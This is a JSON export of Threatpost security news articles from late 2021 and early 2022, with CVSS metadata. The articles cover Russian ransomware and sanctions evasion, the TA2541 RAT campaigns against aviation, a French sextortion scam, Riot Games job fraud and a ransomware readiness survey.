"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-25T21:25:17", "type": "threatpost", "title": "DOJ Indicts Russian Gov\u2019t Employees Over Targeting Power Sector", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-25T21:25:17", "id": "THREATPOST:138507F793D8399AF0EE1640C46A9698", "href": "https://threatpost.com/doj-indicts-russian-govt-employees-over-targeting-power-sector/179108/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:23:28", "description": "Russia may ramp up ransomware attacks against the United States as a way to ease the financial hurt it\u2019s under due to sanctions, U.S. federal authorities are warning. Those sanctions have been levied against the nation and Vladimir Putin\u2019s government due to its invasion of Ukraine.\n\nThe Financial Crimes Enforcement Network (FinCEN) issued a FinCEN Alert [(PDF)](<https://www.fincen.gov/sites/default/files/2022-03/FinCEN%20Alert%20Russian%20Sanctions%20Evasion%20FINAL%20508.pdf>) on Wednesday advising all financial institutions to remain vigilant against potential efforts to evade the expansive sanctions and other U.S.-imposed restrictions related to the current conflict. One way this may be done is to move cryptocurrency funds through ransomware payments collected after Russian state-sponsored actors carry out cyberattacks.\n\n\u201cIn the face of mounting economic pressure on Russia, it is vitally important for U.S. financial institutions to be vigilant about potential Russian sanctions evasion, including by both state actors and oligarchs,\u201d said FinCEN Acting Director Him Das [in a press statement.](<https://www.fincen.gov/news/news-releases/fincen-provides-financial-institutions-red-flags-potential-russian-sanctions>)\n\nFinancial actions taken against Russia by the U.S. Department of the Treasury\u2019s Office of Foreign Assets Control (OFAC) since the nation\u2019s invasion of Ukraine last month are numerous. They include:\n\n * Sanctions against persons who have financial operations in the Russian Federation, including Putin and Russia\u2019s Minister of Foreign Affairs Sergei Lavrov\n * Prohibitions on correspondent or payable-through account and payment processing and blocking of certain Russian financial institutions\n * Prohibitions related to new debt and equity for certain Russian entities\n * A prohibition on transactions involving certain Russian government entities, including the Central Bank of the Russian Federation.\n\nFinCEN now is urging financial institutions \u2013 including those with visibility into cryptocurrency or convertible virtual currency (CVC) flows, such as CVC exchangers and administrators \u2013 to identify and report suspicious activity associated with potential sanctions evasion quickly and conduct an investigation where appropriate.\n\nSo far FinCEN has not seen widespread evasion of sanctions using methods such as cryptocurrency, Das noted. However, \u201cprompt reporting of suspicious activity\u201d can ensure this remains the case to support U.S. efforts and interest in supporting Ukraine.\n\n## **Ramp-Up in Cyber-Attacks **\n\nIndeed, Russia state-sponsored actors already have ramped up cyber-attacks since the beginning of the conflict in the Ukraine; thus, an increase in ransomware activity is not an entirely unlikely prospect.\n\nResearchers at Google\u2019s Threat Analysis Group (TAG) [reported earlier this week](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) that they had observed advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government stepping up phishing attacks against Ukrainian and European targets, as well as distributed denial-of-service (DDoS) attacks against key government and service-oriented Ukrainian websites.\n\nBecause it is not regulated by typical financial currency laws in the United States, cryptocurrency has become a method of choice for cybercriminals to conduct transactions \u2013 including receiving payouts after ransomware attacks. For this reason, it also could be used by Russia to get around U.S. sanctions, noted one security professional.\n\n\u201cFor the tech savvy or oligarch with a need to move money, they can hire the talent to move the transactions,\u201d Rosa Smothers, senior vice president of cyber operations at security firm [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkOYxa_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYuYvpXdvb7-2BNsZCUHkZXL7ec2QLTY2-2FTBe03G8iVYPixd8Bov5GgH6DAKHGUqexQ-2B0nAYVFKMqkBKYw8YYPqfJNrlxOwOTBqCCKReqy6Kmv5Y9-2FNHt4zLkJVstDtTRBPXtmuX1dxVZT3q5fhWHsXeqv-2Fv1cJIX-2Fjlb-2FKnRhdADS-2BgZa5auC32i8V3U0ThbubhxXsqpIt03Hz1cjPy4L3tEOEdvhmz3jLvNd846SsHu-2Fk-3D>) and a former CIA cyber threat analyst and technical intelligence officer, observed in an email to Threatpost.\n\nHowever, while cryptocurrency does provide privacy for storage and process transactions, \u201cthe transparency provided by blockchain could make the movement of large amounts of cryptocurrency detectable by law enforcement,\u201d she noted, citing how the Department of Justice was able to [seize millions of dollars in Bitcoin](<https://threatpost.com/fbi-claws-back-millions-darksides-ransom/166705/>) that Colonial Pipeline paid to the DarkSide group after [a highly disruptive ransomware attack](<https://threatpost.com/pipeline-crippled-ransomware/165963/>) last May.\n\nIndeed, another security professional expressed doubt that Russia could use ransomware payments or any other type of cryptocurrency transactions to evade U.S. sanctions \u201cat any meaningful scale.\u201d\n\n\u201cThe magnitude of the recent sanction reaches into the billions, amounts that are large enough to be unattainable for almost all cryptocurrencies currently,\u201d observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel. \u201cThere may be opportunities at the individual level, but for the scale of nation-state operations and expenditures, a few million or even tens of millions aren\u2019t really going to move the needle.\u201d\n\nLike Smothers, he also noted that the transparency of blockchain technology due to its nature as \u201ca public ledger\u201d makes it easier for financial authorities to observe and trace suspicious cryptocurrency transactions than if sanctioned entities used \u201ctraditional money-laundering means.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:10:04", "type": "threatpost", "title": "Russia May Use Ransomware Payouts to Avoid Sanctions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:10:04", "id": "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "href": "https://threatpost.com/russia-ransomware-payouts-avoid-sanctions/178854/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:44", "description": "Researchers have identified an advanced persistent threat (APT) group responsible for a series of cyberespionage and spyware attacks against the aviation, aerospace, transportation and defense industries since at least 2017 that feature high-volume email campaigns using industry-specific lures.\n\nThe group, which researchers have dubbed TA2541, typically sends hundreds of thousands of malicious messages \u2013 nearly always in English \u2013 that ultimately deliver a remote-access trojan (RAT) payload using commodity malware to collect data from victims\u2019 machines and networks, according to [a new report](<https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight>) by Proofpoint released Tuesday. These campaigns have affected hundreds of organizations across the world, with recurring targets in North America, Europe and the Middle East, researchers said.\n\nThough a number of the group\u2019s attacks already have been tracked by various researchers \u2013 including [Microsoft](<https://twitter.com/MsftSecIntel/status/1392219299696152578>), [Mandiant](<https://www.mandiant.com/resources/dissecting-netwire-phishing-campaigns-usage-process-hollowing>), [Cisco Talos](<https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html>), [Morphisec](<https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader>) and others \u2013 since at least 2019, Proofpoint\u2019s latest research shares \u201ccomprehensive details linking public and private data under one threat activity cluster we call TA2541,\u201d researchers wrote.\n\nIndeed, previously reported attacks related to TA2541 include [a two-year spyware campaign](<https://threatpost.com/airline-credential-theft-campaign/174264/>) against the aviation industry using the AsyncRAT called Operation Layover and uncovered by Cisco Talos last September, and a [cyberespionage campaign](<blank>) against aviation targets spreading RevengeRAT or AsyncRAT revealed by Microsoft last May, among others.\n\n## **Five Years and Still Flying High**\n\nProofpoint first started tracking the actor in 2017 when its tactic of choice was to send messages with \u201cmacro-laden Microsoft Word attachments\u201d that downloaded RAT payloads. The group has since tweaked this tactic and now most frequently sends messages with links to cloud services such as Google Drive or OneDrive hosting the payload, according to the report.\n\nHowever, although the approach to how they hide their malicious payload has varied, the group has mostly remained consistent in its choice of targets, lures and the type of payloads it uses, observed Sherrod DeGrippo, vice president of Threat Research &amp; Detection at Proofpoint.\n\n\u201cWhat\u2019s noteworthy about TA2541 is how little they\u2019ve changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans,\u201d she said in an email to Threatpost. \u201cThis group is a persistent threat to targets throughout the transportation, logistics, and travel industries.\u201d\n\nIn terms of which specific RATs are used, attackers tap a variety of low-hanging fruit \u2013 that is, commodity malware that\u2019s available for purchase on criminal forums or available in open-source repositories. Currently, TA2541 prefers to drop AsyncRAT on victims\u2019 machines but also is known to use NetWire, WSH RAT and Parallax, researchers said.\n\nSo far, all of the malware distributed by the group has been aimed at information-gathering purposes and to gain remote control of an infected machine, with researchers acknowledging that they don\u2019t know the threat actor\u2019s \u201cultimate goals and objectives\u201d beyond this initial compromise, they said.\n\n## **Typical Malicious Emails**\n\nA typical malicious message in a TA2541 campaign uses a lure related to some type of logistical or transportation theme related to one of the particular industries it\u2019s targeting, researchers said.\n\n\u201cIn nearly all observed campaigns, TA2541 uses lure themes that include transportation-related terms such as flight, aircraft, fuel, yacht, charter, etc.,\u201d according to the report.\n\nFor example, researchers revealed an email that impersonated an aviation company requesting information on aircraft parts, as well as another that requested info on how to transport a medical patient on a stretcher on an ambulatory flight.\n\nOnce the COVID-19 pandemic hit in March 2020, the group shifted bait tactics slightly and \u2013 like [many other threat actors](<https://threatpost.com/spearphishing-campaign-exploits-covid-19-to-spread-lokibot-infostealer/154432/>) \u2013 adopted [COVID-related lures](<https://threatpost.com/top-email-protections-fail-covid-19-phishing/154329/>) consistent with their overall theme of cargo and flight details, researchers noted.\n\n\u201cFor example, they distributed lures associated with cargo shipments of personal protective equipment (PPE) or COVID-19 testing kits,\u201d researchers noted.\n\nHowever, this shift was short-lived, and TA2541 rather quickly returned to its more generic, transportation-related email themes, they added.\n\n## **Current Attack Vector**\n\nIn current campaigns observed by Proofpoint, if victims take the bait, they will usually be directed to click on a Google Drive URL that leads to an obfuscated Visual Basic Script (VBS) file, researchers said.\n\n\u201cIf executed, PowerShell pulls an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub,\u201d researchers wrote. \u201cThe threat actor executes PowerShell into various Windows processes and queries Windows Management Instrumentation (WMI) for security products such as antivirus and firewall software, and attempts to disable built-in security protections.\u201d\n\nIn this way, TA2541 collects system information before then downloading the RAT on the host machine, according to the report.\n\nGoogle Drive has been a consistent tool of the threat group, but occasionally TA2541 also will use OneDrive to host the malicious VBS files, researchers said. In late 2021, Proofpoint also observed the group using DiscordApp URLs that link to a compressed file that led to either AgentTesla or Imminent Monitor as an attack vector, researchers said. Indeed, the Discord content delivery network (CDN) has been [an increasingly popular way](<https://threatpost.com/attackers-discord-slack-malware/165295/>) for threat actors to use a legitimate and popular app for nefarious purposes.\n\nOccasionally TA2541 also will use email attachments instead of cloud-based service links, including compressed executables such as RAR attachments with an embedded executable containing URL to CDNs hosting the malware payload, they added.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T14:02:07", "type": "threatpost", "title": "TA2541: APT Has Been Shooting RATs at Aviation for Years", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T14:02:07", "id": "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "href": "https://threatpost.com/ta2541-apt-rats-aviation/178422/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:30:25", "description": "A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.\n\nAs noted by Sophos researchers in a Monday [report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective cybersecurity, law enforcement crackdowns and the rise of ransomware.\n\nThis new campaign is one signal of what may be a resurgence, they said.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n## Threats Sandwich Malware Links\n\nThe new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France\u2019s legal penalties for watching illegal pornography, then tells the reader: \u201cIf you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.\u201d\n\nShould the reader not comply, \u201cwe will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.\u201d\n\nNotably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)\n\nFrench-language sextortion threat email. Source: Sophos.\n\nAttackers use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages. As Sophos explains, \u201cAdding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can\u2019t contain clickable links, or even text that can be copied and pasted.\u201d\n\nBut, as Mike Parkin \u2013 senior technical engineer at Vulcan Cyber \u2013 told Threatpost via email, \u201cThe fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.\u201d\n\n## What is Sextortion?\n\nSextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior from their victim. The attacker demands payment in exchange for not spreading the compromising information or images.\n\nSometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren\u2019t targeted. Rather, they entail blind email blasts that prey on victims\u2019 fear, without any actual evidence of sexual impropriety to back them up.\n\n## Sextortion is on the Rise Again\n\n\u201cScams seem to run in cycles,\u201d notes Parkin. \u201cWhether it\u2019s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn\u2019t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. Eventually, they\u2019ll circle back to an old scam that may have been updated with new text or a new graphic.\u201d\n\nLionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing; \u201cSextortion attempts (real and fake) targeting executives of organizations have increased by 800% in the last 4 months,\u201d he said.\n\nCampaigns targeting ordinary individuals are also spiking: The FBI\u2019s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.\n\nWill this old-hat method of cyber attack prove effective? \u201cIt\u2019s too early to tell what the hit rate is on this technique,\u201d Casey Ellis, Founder and CTO of Bugcrowd, told Threatpost via email, \u201cbut it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.\u201d\n\nTo Parkin, \u201cthe best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T17:20:41", "type": "threatpost", "title": "Sextortion Rears Its Ugly Head Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T17:20:41", "id": "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "href": "https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. \u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019 **\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to illicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the co-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": "https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the 